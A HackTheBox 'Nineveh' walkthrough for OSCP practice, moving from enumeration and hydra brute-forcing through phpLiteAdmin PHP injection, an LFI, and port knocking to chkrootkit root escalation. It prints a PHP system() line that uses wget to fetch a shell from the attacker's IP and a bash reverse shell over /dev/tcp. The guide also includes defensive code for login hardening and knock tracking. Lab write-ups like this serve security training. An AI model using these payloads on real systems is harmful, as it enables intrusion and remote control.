HacktheBox - Nineveh Writeup

03/12/2019

Zero to OSCP Hero Writeup #15 - Nineveh 

Reconnaissance

1. Nmap Scan - Common Ports TCP Scan

Let's start with a TCP scan of the target IP address to determine which common ports are open and which services are running on them:

nmap -sC -sV -oA nmap/initial.tcp 10.10.10.43

  • -sC: Run the default nmap script scan to find potential vulnerabilities
  • -sV: Detect the service version
  • -oA: Output the result of the scan in all formats as nmap/initial.tcp

From the scan we see that only ports 80 and 443 are open. We can also see that the box has a domain name, nineveh.htb, which we can add to our /etc/hosts file.

1.1. Add domain name to /etc/hosts file 

nano /etc/hosts 

10.10.10.43     nineveh.htb

2. Nmap Scan - All TCP Ports Scan

Okay, let's scan the entire TCP port range to confirm that there are no other ports open:

nmap -sC -sV -p- -oA nmap/full.tcp 10.10.10.43

  • -sC: Run the default nmap script scan to find potential vulnerabilities
  • -sV: Detect the service version
  • -p-: Run the nmap scan against all ports
  • -oA: Output the result of the scan in all formats as nmap/full.tcp

The full TCP scan confirmed that there are no additional ports open.

3. Nmap Scan - All UDP Ports Scan

We can do the same full port scan, but with the UDP ports:

nmap -sU -p- -oA nmap/full.udp 10.10.10.43

  • -sU: Run the scan against UDP ports
  • -p-: Run the nmap scan against all ports
  • -oA: Output the result of the scan in all formats as nmap/full.udp

The full UDP scan confirmed that there are no additional ports open.

Enumerating Port 80 

1. Browse to http://nineveh.htb

When we browse to http://nineveh.htb, we get a default web page:

When we check the page source code, there is a comment in there from a user called amrois, to another user, admin: 

2. Check for hidden directories 

As there is not much to go off here, let's see if there are any hidden directories with gobuster:

gobuster dir -u http://10.10.10.43 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt

2.1 Check the hidden directory, /department

After browsing to https://nineveh.htb/department we see that it directs us to a login page. 

After checking for potential SQL injection with sqlmap, it seems that the login page isn't vulnerable to it. There is, however, a flaw in the login page: it returns a different error message depending on whether the username you enter exists in the database:

Invalid Username (entering the username: username): 

Valid Username (Entering the username: admin):

With this flaw, we are able to determine valid usernames by taking note of the error message.
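To make the flaw concrete, here is an added example (not code from the box or the writeup) of a login check that leaks username validity the way /department/login.php does, next to a hardened version that returns one generic message and always computes the password hash so neither the text nor the response time reveals whether the account exists. The user table and password are constructed for the example.

```python
import hashlib
import hmac
import os

def _hash(password: str, salt: bytes) -> bytes:
    """PBKDF2-SHA256 password hash (constructed for the example)."""
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 50_000)

# Constructed sample user table: username -> (salt, stored hash). Not the box's real data.
_SALT = os.urandom(16)
USERS = {"admin": (_SALT, _hash("correct horse", _SALT))}

# Random salt/hash used for unknown users so the hardened check does equal work every time.
_DUMMY = (os.urandom(16), os.urandom(32))


def login_leaky(username: str, password: str) -> str:
    """Mirrors the flaw on the department login page: the error text tells the caller
    whether the username exists, so accounts can be enumerated before any password guess."""
    if username not in USERS:
        return "Invalid Username!"
    salt, stored = USERS[username]
    if not hmac.compare_digest(_hash(password, salt), stored):
        return "Invalid Password!"
    return "OK"


def login_hardened(username: str, password: str) -> str:
    """One generic failure message for both cases, and a hash comparison is performed
    even for unknown users so the timing does not leak account existence either."""
    salt, stored = USERS.get(username, _DUMMY)
    matched = hmac.compare_digest(_hash(password, salt), stored)
    if matched and username in USERS:
        return "OK"
    return "Invalid username or password."
```

A rate limit or lockout on the login endpoint is the other half of the fix, since the generic message alone does not stop the hydra run shown next.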

3. Testing potential passwords for the admin user

As we know that admin is a valid user, I'm going to use hydra to try potential passwords and see if we can get valid credentials by brute-forcing the login page:

hydra 10.10.10.43 -l admin -P /usr/share/seclists/Passwords/rockyou.txt http-post-form "/department/login.php:username=^USER^&password=^PASS^:Invalid Password!" -V

And we found valid admin credentials! 

admin:1q2w3e4r5t

4. Login to the department login page

After logging in, we are greeted with an under construction image:

And when we click on the notes tab, we are greeted with these notes: 

There doesn't seem to be much else to check through on port 80, so let's now move on to port 443!

Enumerating Port 443

1. Browse to https://nineveh.htb 

Again, we are greeted with just an image with no other information. 

2. Check for hidden directories

As there is only an image on the main page, let's see if there are any hidden directories with gobuster:

gobuster dir -k -u https://10.10.10.43 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt 

Note that we have added the -k flag; this is needed when testing over HTTPS so gobuster skips the X.509 certificate verification errors.

So there are a couple of interesting directories, /db and /secure_notes. Let's check out /db first.

2.1 Checking the hidden directory /db

After browsing to https://nineveh.htb/db we find ourselves at another login page, this time for the application phpLiteAdmin v1.9.

3. Searching for phpLiteAdmin 1.9 exploits

Let's see if there are any exploits for this version of phpLiteAdmin with searchsploit:

searchsploit phpliteadmin 1.9 

The top exploit seems interesting, so let's look at it in more detail:

searchsploit -x exploits/php/webapps/24044.txt 

So the exploit requires us to create/change databases, meaning we need to be authenticated!

4. Brute-forcing the phpLiteAdmin login

Let's again use hydra to brute-force the login for phpLiteAdmin:

hydra 10.10.10.43 -l anything -P /usr/share/seclists/Passwords/rockyou.txt https-post-form "/db/:password=^PASS^&remember=yes&login=Log+In&proc_login=true:Incorrect password." -V -s 443

As the phpLiteAdmin login form only requires a password, we can use any username we wish for the -l flag.

To find the parameters needed for the hydra command, we can capture a login request in Burp:

And again, rockyou.txt has the valid password... Password123

Initial Foothold - User

1. Log in to phpLiteAdmin

Now that we have the valid password, we can log in to phpLiteAdmin:

2. Follow the POC of the PHP remote code injection exploit

Let's follow the POC for the exploit: https://www.exploit-db.com/exploits/24044

2.1 Create new database 

I'm going to create a new database called ninevehNotes.php; the reason for this name will become clear in a moment:

Once it is created, we see the exact path to the created database: /var/tmp/<db> 

3. Create a new table in the ninevehNotes.php database

To add a one liner command that will call back to our attacker machine and download a shell script, we need to create a table. We will call the table, table.

3.1 Add php one liner to the table

We now need to change the type from INTEGER to TEXT and add a PHP one-liner in the Default Value field, which will download our PHP reverse shell script:

<?php system("wget http://10.10.14.59:8080/shell.php -O /var/tmp/shell.php"); ?>

3.2 Create shell.php file from kali php reverse shell

Okay, now we need to use the trusty PHP reverse shell file that comes with Kali, rename it to shell.php and change the IP and port for the connection:

3.3 Start python webserver 

Once the shell.php file has been created, we now need to start a webserver so the machine can download it: 

python -m SimpleHTTPServer 8080

3.4 Start Netcat listener 

... and start a netcat listener to catch the connection from the machine once it executes the shell.php file.

nc -lvnp 9001

4. Browse to the created database

We are all set now to have the machine download our shell.php file. The location we are using for this is back on port 80 via the notes page. 

On the notes page, the URL showed a potential LFI: 

?notes=file/ninevehNotes.txt 

We will exploit this by entering /var/tmp/ninevehNotes.php instead of file/ninevehNotes.txt:  

http://10.10.10.43/department/manage.php?notes=/var/tmp/ninevehNotes.php

We get a connection to our netcat listener as www-data! 

Even though we are on the machine, we still don't have access to the user.txt file, as we are only on the machine as www-data.

5. Make our shell fully interactive

https://forum.hackthebox.eu/discussion/142/obtaining-a-fully-interactive-shell

6. Taking a look at the secure_notes directory

After I couldn't find anything of interest from a brief look around the usual priv esc methods, I went back to my initial enumeration of the directories and remembered the secure_notes directory.

Let's go back to it and save the image to our attacker machine.

6.1 Running Binwalk on the image

I'm going to run binwalk on the image to see if there is anything hidden inside the image file. 

binwalk nineveh.png 

Aha. The output shows that there is zlib-compressed data embedded inside the image.

Let's run binwalk again, but with the -Me flags. This extracts all the contents found inside the image file.

binwalk -Me nineveh.png 

Let's see what contents were found in the image through the directory created by binwalk, _nineveh.png.extracted:

We see that there is a folder called 'secret', this contains an RSA private key!  

7. Running Netstat 

We may have a private key which we could use with SSH, but remember from our nmap scan, port 22/SSH was not open.

Let's instead check locally using netstat:

netstat -aunt |grep LISTEN

So port 22, which is used by SSH, is listening on the machine! The reason the nmap scan did not find port 22 open is down to the rules in the /etc/iptables/rules.v4 file:

As you can see, any TCP packets to a port other than 80 or 443 are dropped, so a scan from outside never sees port 22.

8. Port Knocking to allow external SSH access

Port knocking is a method of granting remote access to a service without leaving its port open constantly. This hides the port from port scanning, as we have just seen!

To use port knocking, the server must have a firewall and run the knock daemon, knockd. Simply put, the daemon listens for a specific sequence of TCP or UDP packets; if the sequence is correct, the source IP address that sent the knocks is usually given access through the firewall to the protected port.

8.1 Check the /etc/knockd.conf file 

The knockd.conf file contains the knock sequence needed to open SSH port 22:

cat /etc/knockd.conf 

As you can see, for port 22 to open we need to send TCP packets to ports 571, 290 and 911, in that order.
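To show what the daemon and the firewall are actually doing with that sequence, here is an added simulation (written for this writeup, not knockd's code): it tracks each source address's progress through 571, 290, 911, resets on a wrong port or a slow knock, and applies the rules.v4 policy of only ever passing 80 and 443 plus port 22 for a source that completed the knock. The timeout value is an assumption, standing in for knockd's seq_timeout setting.

```python
from dataclasses import dataclass, field

# Knock sequence from the box's /etc/knockd.conf, in the order the writeup gives it.
KNOCK_SEQUENCE = (571, 290, 911)
SEQ_TIMEOUT = 5.0   # seconds allowed from first to last knock (assumed value)
OPEN_PORT = 22


@dataclass
class KnockTracker:
    """Per-source progress through the knock sequence, the way knockd tracks it."""
    progress: dict = field(default_factory=dict)  # src_ip -> (next index, time of first knock)
    allowed: set = field(default_factory=set)     # sources granted access to OPEN_PORT

    def packet(self, src_ip: str, dst_port: int, ts: float) -> bool:
        """Feed one inbound TCP SYN; returns True when it completes the sequence."""
        idx, started = self.progress.get(src_ip, (0, ts))
        if idx > 0 and ts - started > SEQ_TIMEOUT:
            idx, started = 0, ts            # too slow: the attempt starts over
        if dst_port != KNOCK_SEQUENCE[idx]:
            # Wrong port resets progress; a hit on the first knock starts a fresh attempt.
            self.progress[src_ip] = (1, ts) if dst_port == KNOCK_SEQUENCE[0] else (0, ts)
            return False
        idx += 1
        if idx == len(KNOCK_SEQUENCE):
            self.allowed.add(src_ip)         # knockd would insert the iptables ACCEPT here
            self.progress.pop(src_ip, None)
            return True
        self.progress[src_ip] = (idx, started)
        return False


def firewall_accepts(tracker: KnockTracker, src_ip: str, dst_port: int) -> bool:
    """The rules.v4 policy described above: 80/443 pass, 22 only after a knock, rest DROP."""
    if dst_port in (80, 443):
        return True
    return dst_port == OPEN_PORT and src_ip in tracker.allowed
```

Note that the sequence is a shared secret, nothing more: anyone who can read knockd.conf, as we just did, or sniff the knocks, gets the same access.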

8.2 Creating a for loop to open Port 22

I created this for loop, which sends a packet to each port in the sequence and should then give us SSH access. Let's give it a go:

for i in 571 290 911; do nmap -Pn  --max-retries 0 -p $i 10.10.10.43; done

8.3 Confirm Port 22 is now open

We can run a basic nmap port scan to check if port 22 is now open: 

nmap -p 22 10.10.10.43 

Bingo! :D 

9. Use the RSA private key to log in as amrois via SSH

Let's now try to log in with the private key we found:

chmod 600 nineveh.priv

ssh amrois@10.10.10.43 -i nineveh.priv

10. Grab the user.txt flag 

cat user.txt 

Privilege Escalation - Root 

1. Running LinEnum.sh 

I downloaded LinEnum to the machine by serving the LinEnum.sh file with a Python web server and fetching it with wget.

Make the script executable then run it: 

chmod +x LinEnum.sh

./LinEnum.sh 

1.1 Out of place crontab 

Going through the LinEnum output, I found a crontab that seemed interesting:

2. Checking contents of report-reset.sh 

Okay, so the cron job executes this script, which removes any files with the .txt extension from a directory called /report.

3. Checking the /report directory

Let's find the report directory and see what it holds:

cd /report/

ls -l

Okay, so it seems that a report is created every minute, probably via a cron job. Let's see what one of the reports contains:

cat report-19-11-28:22:49.txt

Okay, so as the sample report above shows, it seems to be checking files for infection by rootkits. After a Google search, it seems that these reports come from a rootkit checker called chkrootkit.

We were able to confirm this by checking to see if chkrootkit was on the machine: 

locate chkrootkit

4. Checking for chkrootkit vulnerabilities 

Let's check searchsploit to see if there are any exploits for chkrootkit:

searchsploit chkrootkit

So it seems that chkrootkit is our way to root by exploiting a local priv esc exploit! 

5. chkrootkit Local Priv Esc Exploit 

Let's take a more detailed look at the exploit:

searchsploit -x exploits/linux/local/33899.txt

Pretty simple exploit: add a reverse shell file in the /tmp folder and call it update!

5.1 Create bash reverse shell one liner file and call it 'update'

I'm going to use the pentest monkey reverse shell cheat sheet and a bash one-liner:

cd /tmp

nano update

#!/bin/bash

bash -i >& /dev/tcp/10.10.14.59/9002 0>&1

5.2 Start netcat listener

Now we need to start a listener to capture the connection: 

nc -lvnp 9002 

We now have a connection from chkrootkit as root! 

6. Grab root.txt 

cat root.txt 

Conclusion

Wow, that was a long writeup! If you're still reading this, kudos to you! Don't forget to like, retweet and comment on the writeup via my Twitter @CraigUnder


Next up is Box #16 - Grandpa!